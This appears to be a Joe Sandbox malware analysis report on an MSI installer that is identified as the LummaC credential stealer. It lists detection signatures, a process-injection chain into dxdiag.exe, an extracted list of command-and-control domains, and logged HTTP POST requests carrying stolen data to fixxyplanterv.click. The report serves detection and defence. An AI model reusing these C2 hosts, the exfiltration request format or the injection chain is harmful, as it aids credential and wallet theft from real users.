Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
msit.msi

Overview

General Information

Sample name:msit.msi
Analysis ID:1589838
MD5:18577f68754f3e2703cdca2df9ba65ff
SHA1:8d8846470510b1b6f81c0725975c7c3589568bb3
SHA256:413c17f73a0831d6ae209e491856a66e07e8c0af70e7e06f68a7b7570ccb3a95
Tags:ghd78sgithubmsiuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • msiexec.exe (PID: 992 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\msit.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 416 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6036 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 031803DE2C6D91C23BF4AB9F8F38A8DE MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIAEB.tmp (PID: 2248 cmdline: "C:\Windows\Installer\MSIAEB.tmp" MD5: 4D82074854750FDBA89D76624CC1E6F6)
      • dxdiag.exe (PID: 4828 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1708 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
{"C2 url": ["fixxyplanterv.click", "print-vexer.biz", "se-blurry.biz", "dwell-exclaim.biz", "zinc-sneark.biz", "impend-differ.biz", "dare-curbys.biz", "covery-mover.biz", "formy-spill.biz"], "Build id": "ZqchOa--new"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: dxdiag.exe PID: 1708JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: dxdiag.exe PID: 1708JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: dxdiag.exe PID: 1708JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T08:29:11.533777+010020283713Unknown Traffic192.168.2.649711172.67.134.197443TCP
              2025-01-13T08:29:12.760819+010020283713Unknown Traffic192.168.2.649717172.67.134.197443TCP
              2025-01-13T08:29:13.982385+010020283713Unknown Traffic192.168.2.649728172.67.134.197443TCP
              2025-01-13T08:29:15.144517+010020283713Unknown Traffic192.168.2.649734172.67.134.197443TCP
              2025-01-13T08:29:16.338516+010020283713Unknown Traffic192.168.2.649741172.67.134.197443TCP
              2025-01-13T08:29:18.004044+010020283713Unknown Traffic192.168.2.649753172.67.134.197443TCP
              2025-01-13T08:29:19.579194+010020283713Unknown Traffic192.168.2.649765172.67.134.197443TCP
              2025-01-13T08:29:21.624274+010020283713Unknown Traffic192.168.2.649781172.67.134.197443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T08:29:12.199354+010020546531A Network Trojan was detected192.168.2.649711172.67.134.197443TCP
              2025-01-13T08:29:13.263540+010020546531A Network Trojan was detected192.168.2.649717172.67.134.197443TCP
              2025-01-13T08:29:21.949582+010020546531A Network Trojan was detected192.168.2.649781172.67.134.197443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T08:29:12.199354+010020498361A Network Trojan was detected192.168.2.649711172.67.134.197443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T08:29:13.263540+010020498121A Network Trojan was detected192.168.2.649717172.67.134.197443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-13T08:29:16.950627+010020480941Malware Command and Control Activity Detected192.168.2.649741172.67.134.197443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000004.00000002.2193785940.000001DCF5E51000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["fixxyplanterv.click", "print-vexer.biz", "se-blurry.biz", "dwell-exclaim.biz", "zinc-sneark.biz", "impend-differ.biz", "dare-curbys.biz", "covery-mover.biz", "formy-spill.biz"], "Build id": "ZqchOa--new"}
              Source: C:\Windows\Installer\MSIAEB.tmpReversingLabs: Detection: 63%
              Source: msit.msiVirustotal: Detection: 57%Perma Link
              Source: msit.msiReversingLabs: Detection: 55%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.5% probability
              Source: C:\Windows\Installer\MSIAEB.tmpJoe Sandbox ML: detected
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: impend-differ.biz
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: print-vexer.biz
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: dare-curbys.biz
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: covery-mover.biz
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: formy-spill.biz
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: dwell-exclaim.biz
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: zinc-sneark.biz
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: se-blurry.biz
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fixxyplanterv.click
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ZqchOa--new
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00415971 CryptUnprotectData,6_2_00415971
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49781 version: TLS 1.2
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: msit.msi, 5403ef.msi.2.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: msit.msi, MSI839.tmp.2.dr, 5403ef.msi.2.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: msit.msi, MSI839.tmp.2.dr, 5403ef.msi.2.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: msit.msi, MSI670.tmp.2.dr, 5403ef.msi.2.dr
              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 152A0A64h6_2_0040D866
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h6_2_0043C8F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, ebx6_2_00415971
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh6_2_0043CA10
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [eax], dl6_2_0040E458
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edi, dword ptr [esi+10h]6_2_0040E458
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [eax], dl6_2_0040E458
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax6_2_0043D400
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-5Ch]6_2_0043D400
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+eax*8], 299A4ECDh6_2_0043D400
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, dword ptr [esi+04h]6_2_0040CDD7
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax6_2_00438640
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebx, byte ptr [ebp+edi-14B5D619h]6_2_004227B0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], B12AB835h6_2_0041805C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [edi], bl6_2_00409070
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax6_2_00425800
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [ecx], dx6_2_0041C802
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [esi], cl6_2_00425820
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 71D94D17h6_2_004180EC
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+76h]6_2_004238F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 403020B8h6_2_0040D136
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx esi, byte ptr [edx]6_2_004029C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+eax*8], 9CAC4597h6_2_0040D9D6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, dword ptr [esi+28h]6_2_0042A9D5
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], 85917B02h6_2_004181E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, ecx6_2_004181E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 4D507EB0h6_2_004181E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h6_2_004181E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h6_2_004181E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 7FC6CA61h6_2_004181E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [esi], al6_2_004181E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h6_2_004181E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h6_2_004181E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [esi], cx6_2_004231F6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx esi, word ptr [eax]6_2_004231F6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax6_2_0041A9B0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [edx], bp6_2_0041CA48
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then jmp ecx6_2_0043BA70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov esi, edx6_2_0043BA70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, dword ptr [esi+28h]6_2_0042AAC6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, dword ptr [esi+28h]6_2_0042AAD7
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then lea edx, dword ptr [edx+edx*4]6_2_004082F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax6_2_004362F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 67F3D776h6_2_004362F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A59EDA7h]6_2_00426282
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]6_2_0041DA80
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, dword ptr [esi+28h]6_2_0042AA8A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebx, byte ptr [edx]6_2_00432AA0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]6_2_004022B0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then jmp eax6_2_0041BB20
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp word ptr [ebx+esi], 0000h6_2_0041C330
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+65184CD6h]6_2_00436BE4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]6_2_00407450
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]6_2_00407450
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A59EDA7h]6_2_004264F2
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-5Ch]6_2_0043CCF0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h6_2_0043CCF0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebx, word ptr [eax]6_2_0043CCF0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then jmp ecx6_2_0040A4FC
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov byte ptr [edi], al6_2_00416CBD
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, di6_2_0042456F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx esi, byte ptr [eax]6_2_00421D73
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edi, byte ptr [ecx]6_2_00421D73
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h6_2_00438D70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h6_2_00438D70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 1F1F7B79h6_2_00417D74
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx-00000095h]6_2_0042A58E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]6_2_00428DB0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+40h]6_2_0041AEC5
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov word ptr [ecx], dx6_2_0040DEE9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then jmp eax6_2_0043B6F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, edx6_2_0041676A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch6_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov ecx, eax6_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh6_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh6_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h6_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h6_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh6_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h6_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax-4D5F809Ah]6_2_0043A71E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then mov edx, ecx6_2_00409730
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-35CC155Bh]6_2_0041AFD8
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 4x nop then movzx ecx, di6_2_0042456F

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49717 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49717 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49711 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49781 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49741 -> 172.67.134.197:443
              Source: Malware configuration extractorURLs: fixxyplanterv.click
              Source: Malware configuration extractorURLs: print-vexer.biz
              Source: Malware configuration extractorURLs: se-blurry.biz
              Source: Malware configuration extractorURLs: dwell-exclaim.biz
              Source: Malware configuration extractorURLs: zinc-sneark.biz
              Source: Malware configuration extractorURLs: impend-differ.biz
              Source: Malware configuration extractorURLs: dare-curbys.biz
              Source: Malware configuration extractorURLs: covery-mover.biz
              Source: Malware configuration extractorURLs: formy-spill.biz
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49728 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49765 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49734 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49781 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49753 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49741 -> 172.67.134.197:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49717 -> 172.67.134.197:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GCRSQKWBECOUZEBTXP7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12863Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0B0BRVQPHOX7M5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15079Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6KL9F4AUEFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19913Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HC6MUG7SIZ2ZMCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1208Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1T0PER0JZ2WX3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552115Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: fixxyplanterv.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: fixxyplanterv.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fixxyplanterv.click
              Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: dxdiag.exe, 00000006.00000003.2241150379.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
